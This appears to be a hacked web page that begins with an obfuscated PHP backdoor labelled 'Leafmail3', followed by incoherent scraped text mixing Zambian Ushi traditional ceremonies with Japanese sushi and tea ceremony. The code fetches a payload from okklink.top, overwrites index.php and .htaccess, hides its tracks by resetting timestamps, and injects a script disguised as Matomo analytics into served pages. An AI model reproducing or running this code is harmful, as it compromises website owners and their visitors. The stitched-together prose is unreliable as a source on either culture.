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<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
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<p><strong>Ushi traditional ceremony.  Aug 3, 2023 · Kaiseki, written as 懐石, or cha-kaiseki (茶懐石), refers to a meal served at a Japanese tea ceremony, where Buddhist monks would carry warm stones on their stomachs to keep hunger at bay while fasting.  This includes not only traditional sushi ingredients like tuna and salmon but also less common options like mackerel, sardines, and sea urchin.  CEREMONY DISTRICT CHIEF Jul 12, 2011 · Chief Mushota Kawamba Chishinga Chishinga Malaila October Chief Matanda Mansa Ushi Chibuka October Chief Mabumba Mansa Ushi Makumba August LUSAKA PROVINCE CHIEF DISTRICT TRIBE CEREMONY MONTH Snr.  Tribe Ushi Speaking People of Mansa District Traditional Ceremony Mutuna Mpanga Activities at the Ceremony The Ushi-speaking people are an ethnic group residing in the Mansa District of Zambia.  After the girl has gone through her initiation she is allowed to marry him.  During the event,the Luapula River is crossed 3 times in remembrance of their ancestors who did the same Small rice balls with fish, shellfish, etc.  Kaiseki (懐石) or kaiseki-ryōri (懐石料理) is a traditional multi-course Japanese dinner.  The couple Aug 10, 2021 · Head chef Yusuke Maruyama has a winning way with traditional Edo-style techniques such as kobujime (marinating seafood between blades of kombu kelp) and shoyuzuke (briefly steeping fish in soy sauce).  CEREMONY DISTRICT CHIEF TRIBE MONTH Ikubi Lya Loongo: Ushi: October Lusaka Province.  🎌 Here&rsquo;s some highlights: Explore Tokyo&rsquo;s vibrant neon-lit districts, local food spots, tiny bars and unique nightlife Discover the authentic delicacies of Osaka on a local street food tour Stay overnight in a Buddhist temple, joining resident monks in their daily rituals Learn how to master the art of sushi-making with a local chef Dec 29, 2023 · Sushi is a traditional Japanese dish that typically consists of vinegared rice combined with various ingredients, such as seafood, vegetables, and occasionally tropical fruits.  Home Experiences travel events shop Inspiration about get started 日本語 Jan 28, 2020 · It takes about 90 minutes to make sushi rice.  Central Province CEREMONY DISTRICT CHIEF TRIBE MONTH Ikubi Lya Loongo Mumbwa Senior Chief Shakumbila Sala July Kulamba Kubwalo Chibombo Senior chief Mukuni Lenje Jun 19, 2015 · Aji (horse mackerel) - one of the most popular types of fish in Japan (Photo: Jessica A Paje) Sushi-ya or Kaiten-zushi.  Sep 5, 2024 · Located 20 minutes from Sendai Station by train, come to rural Iwanuma for a serene outdoor tea ceremony at the legendary Snake Shrine, which is said to send prosperity your way.  Matcha, a type of powdered green tea, plays an integral role in Japanese culture. A tea ceremony in Japan involves preparing and drinking green tea (&ldquo;matcha&rdquo;) in a tearoom (&ldquo;chashitsu&rdquo;) with a tatami floor Traditional Ceremonies.  There is an old folk tales for the ceremony husbands go fetch salt from distant places, which represent his fulfillment as a husband.  MONTH DISTRICT TRIBE CEREMONY August Mansa Ushi Makumba August Mungwi Bemba Ukusefya Pa Ng&rsquo;wena August Luwingu Bemba Mukulu Pembe August Mwinilunga Lunda Chisemwa Cha Lunda August Zambezi Lunda Lunda Lubanza August Mufumbwe Kaonde Makundu August Zambezi&euro;&euro; Luvale&euro;&euro; Likumbi Lya Mize&euro;&euro;&euro; August Solwezi Kaonde Lubinda Ntongo Kaiseki is said to date back to the 16th century, when tea master Sen-no-Rikyu introduced an austere version of the cuisine to accompany the tea ceremony.  I will serve you a bowl of matcha and Japanese sweets.  Sep 20, 2024 · The Japanese tea ceremony is considered to be an essential part of Japanese culture and hospitality, combining traditional aesthetics and rituals with matcha green tea.  &ldquo;Ichibwela Mushi&rdquo; is phrase denoting members of the Lala and Swaka communities returning home at Special experience to cook wearing Jappanese traditional costume (not KIMONO) The Japanese Cooking Workshop provides you will a once in a life time experience: learning traditional Japanese dishes from local cooks in Japan! Tokyo is considered the food capital in Japan and there are many appetizing dishes from the area for you to try.  Here this is the first of the three groups crossing from Congo into Zambia walking on Luapula River just Zambian Traditional Ceremonies.  Pour only a suitable amount of soy sauce into the bowl and add later if needed.  While you can get a 10-pack of good-tasting sushi for around 800 to 1,000 yen at the supermarket, it goes without saying that eating sushi at a restaurant is one of the must-do activities in Japan.  Once you start to play with the ingredients, and mix up a lot of different flavors it isn&rsquo;t traditional anymore.  ushi.  This time we're pleased to let you know another important style of Shiki-bocho, &quot;Seiwa Shijyo-ryu&quot;.  Sushi is a beloved Japanese dish that combines vinegared rice, raw or cooked seafood, and various ingredients wrapped in seaweed, known as nori.  Nc&rsquo;wala is an annual traditional ceremony where the Ngoni people of Eastern Province of Zambia come together to pay homage to their god, ancestral spirits and chief Mpezeni for the gift of the first fruits and food.  on top.  Zambia has many ceremonies across its 72 ethnic group based on customs, material culture, oral history, rituals, social life and spiritual culture.  &quot;Seiwa&quot; comes from the name of Seiwa emperor (a.  After having your sushi lunch, you can enjoy a tea ceremony.  859~876).  [1] There are two kinds of traditional Japanese meal styles called kaiseki or kaiseki-ryōri.  They are known for their vibrant cultural heritage and the Mutuna Mpanga traditional ceremony, which holds immense significance in their lives.  It&rsquo;s not only used in the traditional tea ceremony but also incorporated into various desserts and sweets.  11K views, 103 likes, 1 loves, 36 comments, 15 shares, Facebook Watch Videos from Zambian TV: Bemba's (Ushi) Traditional Ceremony Ncwala Traditional Ceremony.  Before becoming a chef, Mori regularly trained in traditional Japanese tea ceremony in Ushi no toki mairi (Japanese: 丑の時参り, lit.  There is also sushi that is specific to the region.  Nov 20, 2023 · A great figure in Japanese tea history, Sen no Rikyu (1522-1591), is credited with creating the Japanese tea ceremony &ndash; a formal gathering hosted by a tea master.  It is a ceremonial way of preparing and drinking green tea typically in a traditional tearoom with tatami floor.  While the city holds on to its age-old traditions, sushi chefs in Kyoto are also known for their innovative approach to sushi.  Matcha: The Art of Tea.  During the ceremony, the Chitimukulu (Chief) is carried on a throne made of a paper mache crocodile.  The formula of a kitchen knife ceremony, &quot;Shiki-bocho&quot;, was established as an imperial command around The tea ceremony &mdash;or, directly translated, the &quot;way of tea&quot;&mdash;is in many ways a microcosm of the Japanese traditional sense of omotenashi, which translates as to look after guests wholeheartedly.  Bemba's (Ushi) Traditional Ceremony Oct 